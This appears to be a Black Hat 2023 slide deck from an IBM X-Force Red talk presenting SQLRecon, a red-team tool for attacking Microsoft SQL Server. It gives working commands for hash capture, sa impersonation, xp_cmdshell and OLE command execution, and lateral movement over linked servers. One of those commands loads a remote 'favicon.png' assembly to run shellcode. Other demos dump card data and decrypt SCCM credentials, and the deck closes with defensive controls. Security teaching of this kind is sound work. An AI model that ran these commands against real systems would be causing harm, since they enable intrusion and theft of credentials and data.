Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon

#BHUSA @BlackHatEvents
Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
IBM X-Force Red Adversary Services

Information Classification: General
Senior Managing Security Consultant, Adversary Services at IBM X-Force Red
- Red Team Operator / Adversary Simulation
- Post-Exploitation Tool Developer
- github.com/xforcered/SQLRecon
Sanjiv Kawa
@sanjivkawa
github.com/skahwah
Intro
IBM X-Force Red

Agenda
Microsoft SQL Server Overview 2 min
SQLRecon Overview 4 min
10 Demos! 20 min
- Enumeration
- Standard Modules
- Attacking MS SQL Server with Low Privileges
- Abusing MS SQL Impersonation
- Attacking Linked MS SQL Servers
- Attacking MS MECM / SCCM Databases
Defensive Considerations 3 min
Questions 5 min

Get Involved!
Hack with me
Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases
Spin up a Windows VM
Connect to SSID SQLRecon-Lab, don’t worry, it’s safe
Connection details will be provided before demo’s

Microsoft SQL Server Overview

MS SQL Server Overview
Relational database which allows the storage and retrieval of data
Deployed on-premise on top of Microsoft Server or in the cloud
Used by businesses of all sizes, not just large enterprise networks
Tightly integrated into Active Directory / Azure Active Directory

Why Attack MS SQL Server?
Often overlooked
Often misconfigured
BUILTINUsers can connect to MS SQL Server by default, and:
- Execute basic SQL commands
- Determine privileges via user mapping/roles
- UNC Path injection
- Piggyback off rights to compromise linked SQL servers

Why Attack MS SQL Server?
In late 2022, Kaspersky reported seeing a 56% rise in MS SQL Server attacks

SQLRecon Overview

What’s currently available?
A good amount of offensive MS SQL Sever tools already exist

How did this research come about?
Like most tooling … to solve a problem encountered on an engagement
PowerShell is good, but C# is better when evading modern defensive controls
Address the MS SQL Server C# post-exploitation tooling gap
- Modernize the approach red teamers can take when facing MS SQL Server
- Operational Security
- Execution Guardrails
- SQLRecon works with a diverse set of C2 frameworks
- Fork & Run and In-Process compatible

New Features for Black Hat
SQLRecon v2.2.2
- Windows Token
- Local Database
- AzureAD
3 Authentication Providers

SQLRecon v2.2.2
- Windows Token
- Local Database
- AzureAD
SQLRecon v3.3
+ Windows Domain
+ Azure Local Database

SQLRecon v2.2.2
- Enumerate and Query MS SQL databases
- Execute arbitrary operating system commands
- Abuse impersonation
- Attack linked MS SQL servers
57 Modules

SQLRecon v2.2.2
- Enumerate and Query MS SQL databases
- Execute arbitrary operating system commands
- Abuse impersonation
- Attack linked MS SQL servers
57 Modules
SQLRecon v3.3
+ Ground up rewrite using MS C#/.NET code guide
+ Many new enumeration and execution modules
+ Support for attacking MECM / SCCM Databases
+ Better OPSEC and execution guardrails
+ Brand new wiki
+ And more!
83 Modules

Command Line Usage
SQLRecon is straight forward to use. There are only three required arguments:

Command Line Usage
- An authentication type
SQLRecon.exe /Auth:WinToken

Command Line Usage
- The hostname or IP address for a MS SQL Server
SQLRecon.exe /Auth:WinToken /Host:SQL01

Command Line Usage
- A module
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases

Command Line Usage
- A module
Example: Enumerating databases on a remote MS SQL Server.

Command Line Usage
- A module
Example: Enumerating databases on a remote MS SQL Server
Shortform command line arguments and case-insensitive
SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases

Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:

Authentication Type Example
WinToken SQLRecon.exe /a:WinToken /h:host /m:module

WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module

Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module

AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module

AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module

Module Overview
SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios
Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution:
Module
Privilege
Escalation
Lateral
Movement
Command
Execution
xp_cmdshell ✅ ✅ ✅
OLE Automation Procedures ✅ ✅ ✅
CLR Integration for Custom .NET Assemblies ✅ ✅ ✅
Agent Jobs ✅ ✅ ✅
Cleartext ADSI Credential Retrieval ✅
MECM / SCCM User Management ✅
Cleartext MECM / SCCM Credential Retrieval ✅

Demo Time

Get Involved!
Rules
Don’t DoS the lab. We’re all here to learn together.
Don’t attack each other. We’re all here to learn together.
You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.

Get Involved!
WiFi
SSID: SQLRecon-Lab
Password: SQLReconBH2023!
Lab
DC01 172.16.10.100
SQL01 172.16.10.101
SQL02 172.16.10.102
SQL03 172.16.10.104
MECM01 172.16.10.103
ecom01.database.windows.net
Test Connection String
SQLRecon.exe /a:WinDomain
/d:kawalabs /u:jsmith
/p:Password123 /h:172.16.10.101
/m:whoami
Rules
Don’t DoS the lab. We’re all here to learn together.
Don’t attack each other. We’re all here to learn together.
You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.

Demo 1
Evaluating the current user’s permissions

Demo 1

Demo 1
Recap
- Used the whoami command to determine the permissions for the current user
- Determined that KAWALABSJSmith is a Domain User in the KAWALABS.LOCAL domain.

Demo 2
Locating MS SQL Servers in AD via SPNs

Demo 2

Demo 2
Recap
- Used SQLRecon to connect to AD in context of KAWLABSJSmith and locate MS SQL Servers via registered SPNs
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and gather MS SQL Server information
SQLRecon.exe /e:SQLSpns /d:kawalabs.local
SQLRecon.exe /a:WinToken /h:SQL02 /m:info

Demo 3
Enumerating Azure MS SQL Server Database

Demo 3

Demo 3
Recap
- Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list permissions
- Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list databases
- Performed an ad-hoc SQL query to obtain the contents of the cc table in the Payments database
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123
/h:ecom01.database.windows.net /m:whoami
/h:ecom01.databases.windows.net /m:databases
/h:ecom01.databases.windows.net /database:Payments /m:query /c:”select * from cc”

Demo 4
Unprivileged UNC Path Injection

Demo 4

Demo 4
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and initiate an SMB request to receive a NetNTLMv2 hash
SQLRecon.exe /a:WinToken /h:SQL02 /m:smb /rhost:172.16.10.19Projects

Demo 5
Operational Security and Execution Guardrails

Demo 5

Demo 5
Recap
- Used SQLRecon to connect to SQL01 in context of KAWLABSJSmith and attempted to execute commands via xp_cmdshell
- Attempted to enable xp_cmdshell on SQL01 in context of KAWLABSJSmith
- As expected, KAWLABSJSmith encounters an execution guardrail on SQL01 due to insufficient privileges
SQLRecon.exe /a:WinToken /h:SQL01 /m:xpCmd /c:notepad.exe
SQLRecon.exe /a:WinToken /h:SQL01 /m:enableXP

Demo 6
Privilege Escalation: Abusing Impersonation
BUILTINUsers can impersonate sa!

Demo 6
Privilege Escalation: Abusing Impersonation

Demo 6

Demo 6
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate accounts that can be impersonated
- Enabled OLE Automation Procedures on SQL02 via impersonation
- Executed an arbitrary command using OLE Automation Procedures on SQL02 by abusing impersonation
SQLRecon.exe /a:WinToken /h:SQL02 /m:impersonate
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableOle
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iOleCmd /c:”powershell.exe ls
172.16.10.19Projects”

Demo 6
Recap
- Enabled xp_cmdshell on SQL02 via impersonation
- Executed an arbitrary command using xp_cmdshell on SQL02 by abusing impersonation
- Practiced good OPSEC by reverting OLE Automation Procedures and xp_cmdshell on SQL02 to the original state
SQLRecon.exe /a:WinToken /h:SQL02 /m:iEnableXp
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iXpCmd /c:tasklist
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableOle
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableXp

Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
SQL02 has an MS SQL Server link to SQL03

Demo 7

Demo 7
- CLR Integration allows custom .NET assemblies to be imported into MS SQL Server
- Assemblies get stored inside a SQL database Stored Procedure
- You can then execute whatever is inside the custom assembly!

Demo 7
Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
// sql.cs
// C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void CustomFunctionName()
{
Process proc = new Process();
proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe";
proc.Start();
}
}

Demo 7

Demo 7
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate linked MS SQL Server
- Listed permissions on SQL03 after riding the MS SQL Server link via SQL02
- Enabled CLR Integration on SQL03 via SQL02
- Downloaded a custom .NET CLR assembly via HTTPS and executed it on SQL03 via SQL02 in order to laterally move
SQLRecon.exe /a:WinToken /h:SQL02 /m:links
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lWhoami
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lEnableClr
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:https://cdn.popped.io/favicon.png
/function:ExecuteShellcode

Demo 8
Credential Abuse: ADSI Double-Link Boomerang
SQL03 has an ADSI link to DC01

Demo 8
Credential Abuse: ADSI Double-Link Boomerang

Demo 8

Demo 8
Recap
- Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate links on SQL03
- Started a local LDAP server on SQL03 via SQL02 an obtained the cleartext credential for the account used to link SQL03 to DC01
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lLinks
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lAdsi /rhost:linkADSI /lport:49103

Demo 9
SCCM / MECM Enumeration

Demo 9

Demo 9
Recap
- Used SQLRecon to connect to the database of MECM01 and list databases
- Enumerated users who are authorized to authenticate against SCCM
- Listed tasks configured in SCCM
SQLRecon.exe /a:WinToken /h:MECM01 /m:databases
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sUsers
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sTaskList

Demo 10
Privilege Escalation: SCCM / MECM

Demo 10

Demo 10
Recap
- Used SQLRecon to connect to the database of MECM01 and list vaulted credentials
- Decrypted SCCM vaulted credentials (shout out to Adam Chester @_xpn_)
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sCredentials
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sDecryptCredentials

Defensive Considerations

Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance!
github.com/xforcered/SQLRecon/wiki

Top 3 Network Security Controls
- Account for network routes to MS SQL Server
- Limit routes to only authorized set of systems/subnets
- Ensure you are receiving telemetry via network logging and monitoring tools

Top 3 Endpoint Security Controls
- Regularly control tune your EDR solutions
- Evaluate if your host-based security controls (EDR / AV) supports scanning of .NET assemblies in memory
- Application allow listing

Top 3 MS SQL Server Security Controls
- Follow the Microsoft SQL Server security best practices
- Consider removing or restricting the BUILTINUsers
account and low privilege groups from authenticating
against MS SQL Server instances
- Evaluate impersonation and MS SQL Server links

@sanjivkawa
github.com/skahwah
Thank You
IBM X-Force Red
@xforcered
github.com/xforcered/SQLRecon
Question or Comments?

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon

Similar to Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon (20)

Recently uploaded

Recently uploaded (20)

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon